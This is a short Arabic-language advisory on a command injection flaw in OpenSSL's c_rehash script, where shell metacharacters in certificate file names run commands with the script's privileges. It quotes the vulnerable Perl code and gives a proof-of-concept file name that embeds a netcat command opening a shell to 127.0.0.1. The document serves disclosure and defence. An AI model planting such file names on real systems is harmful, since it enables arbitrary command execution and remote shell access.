
OpenSSL

لا يقوم script c_rehash بتعقيم محارف الصدفة (shell metacharacters) بشكل صحيح لمنع حقن الأوامر.
يتم توزيع هذا السكريبت من قبل بعض أنظمة التشغيل بطريقة يتم فيها تنفيذه تلقائيًا.
على هذه الأنظمة، يمكن للمهاجم تنفيذ أوامر عشوائية بصلاحيات السكريبت.
يعتبر استخدام السكريبت c_rehash قديمًا ويجب استبداله بأداة سطر الأوامر rehash من OpenSSL.
يتم تنفيذ هذا السكريبت بواسطة update-ca-certificates، من
ca-certificates، لإعادة ترتيب الشهادات في /etc/ssl/certs/. يمكن للمهاجم القادر على
وضع ملفات في هذا الدليل تنفيذ أوامر عشوائية بصلاحيات
السكريبت.
يحدث حقن الأوامر لأن أسماء الملفات لا يتم تعقيمها بشكل صحيح:
$fname =~ s/'/'\\''/g;my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`;هذا الجزء من السكريبت قابل للاستغلال، حيث أن إغلاق الـ backticks يتيح تنفيذ الأوامر، على سبيل المثال ملف باسم: MyCert.crt`whoami` سيقوم بتشغيل "whoami".
/etc/ssl/certs/ (الافتراضي) أو المسارات الأخرى المكوّنة في update-ca-certificatesecho "-----BEGIN CERTIFICATE-----" > "hey.crt\`nc -c sh 127.0.0.1 12345\`" (nc كمثال للحمولة)c_rehash .